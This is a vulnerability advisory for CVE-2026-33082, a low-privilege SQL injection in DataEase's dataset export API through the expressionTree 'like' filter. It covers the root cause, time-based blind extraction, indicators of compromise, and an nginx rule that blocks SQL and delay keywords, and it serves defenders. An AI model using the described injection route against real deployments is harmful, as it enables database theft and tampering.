CVE-2026-33082 Overview
DataEase, an open source data visualization analysis tool, contains a SQL injection vulnerability in its dataset export functionality affecting versions 2.10.20 and below. The vulnerability exists in the expressionTree parameter within the POST /de2api/datasetTree/exportDataset endpoint, where user-controlled filter values are deserialized and passed to WhereTree2Str.transFilterTrees for SQL translation without proper sanitization. This allows attackers with low-level privileges to inject arbitrary SQL commands through the "like" filter terms, enabling blind SQL injection attacks including time-based extraction of sensitive database information.
Critical Impact
Authenticated attackers can execute arbitrary SQL commands against the backend database, potentially leading to unauthorized data access, data modification, or complete database compromise through blind SQL injection techniques.
Affected Products
- DataEase versions 2.10.20 and below
- DataEase data visualization deployments using the dataset export API endpoint
- Self-hosted DataEase installations with network-accessible API endpoints
Discovery Timeline
- April 16, 2026 - CVE CVE-2026-33082 published to NVD
- April 16, 2026 - Last updated in NVD database
Technical Details for CVE-2026-33082
Vulnerability Analysis
This SQL injection vulnerability (CWE-89) stems from improper input validation in the dataset export workflow. When a user submits a request to export dataset data, the expressionTree parameter is deserialized into a filtering object structure. This object is subsequently processed by the WhereTree2Str.transFilterTrees method, which constructs SQL WHERE clauses based on the filter definitions.
The critical flaw occurs when handling "like" filter terms within the expression tree. Values provided in these filter terms are directly concatenated into SQL fragments without any sanitization or parameterized query handling. An attacker can craft malicious input that escapes the string literal context in the filter value, thereby injecting arbitrary SQL syntax into the generated query.
The network-accessible nature of this vulnerability combined with the low privilege requirements makes it particularly dangerous for organizations running DataEase in environments accessible to authenticated users. Successful exploitation can lead to complete compromise of confidentiality, integrity, and availability of the underlying database.
Root Cause
The root cause is insufficient input validation and lack of parameterized queries in the WhereTree2Str.transFilterTrees method. When processing filter expressions containing "like" operators, the code directly concatenates user-supplied values into SQL statement strings. This violates secure coding practices that mandate the use of prepared statements or parameterized queries for all database operations involving user input.
Attack Vector
The attack is executed over the network against the DataEase API endpoint. An authenticated attacker with low-level privileges sends a crafted POST request to /de2api/datasetTree/exportDataset containing a malicious expressionTree parameter. By injecting SQL metacharacters that break out of the string literal context in a "like" filter term, the attacker can append arbitrary SQL commands.
Time-based blind SQL injection techniques are particularly effective, allowing attackers to extract database information character by character by observing response timing differences. This method can be used to enumerate database schemas, extract sensitive data, or potentially escalate privileges within the database system.
Detection Methods for CVE-2026-33082
Indicators of Compromise
- Unusual or malformed requests to the /de2api/datasetTree/exportDataset endpoint containing SQL syntax in filter parameters
- Abnormally long response times from dataset export requests indicating time-based injection probing
- Database query logs showing unexpected SLEEP(), WAITFOR DELAY, or BENCHMARK() functions
- Error logs containing SQL syntax errors originating from dataset export operations
- Multiple rapid requests to the export endpoint from the same user session
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in POST request bodies to the dataset export endpoint
- Monitor application logs for repeated 500 errors or SQL-related exceptions from the transFilterTrees method
- Deploy database activity monitoring to detect unusual query patterns including time-based blind injection signatures
- Review authentication logs for compromised accounts that may be used to exploit this vulnerability
Monitoring Recommendations
- Enable verbose logging on the DataEase API layer to capture full request payloads to the /de2api/datasetTree/exportDataset endpoint
- Configure database query logging to identify injection attempts and track query execution times
- Set up alerting for anomalous database response latencies that may indicate time-based exploitation
- Implement real-time monitoring of dataset export API usage patterns per user account
How to Mitigate CVE-2026-33082
Immediate Actions Required
- Upgrade DataEase to version 2.10.21 or later immediately to remediate this vulnerability
- Review access logs for evidence of exploitation attempts against the dataset export endpoint
- Restrict network access to the DataEase API to trusted users and networks pending upgrade
- Audit database logs for signs of data exfiltration or unauthorized queries
- Review and rotate database credentials if exploitation is suspected
Patch Information
The DataEase development team has addressed this vulnerability in version 2.10.21. Organizations should upgrade to this version or later to receive the security fix. The patch is available through the official GitHub Release v2.10.21. Additional technical details about the vulnerability can be found in the GitHub Security Advisory GHSA-xxpw-2c8q-g693.
Workarounds
- Implement a reverse proxy or WAF rule to block requests containing SQL injection patterns in the expressionTree parameter
- Temporarily disable or restrict access to the /de2api/datasetTree/exportDataset endpoint until patching is complete
- Apply network segmentation to limit which users and systems can access the DataEase API
- Configure database user permissions to enforce least privilege, limiting the potential impact of successful injection
# Example: Block suspicious requests at reverse proxy level (nginx)
# Add to location block for /de2api/datasetTree/exportDataset
if ($request_body ~* "(union|select|insert|update|delete|drop|sleep|waitfor|benchmark)") {
return 403;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
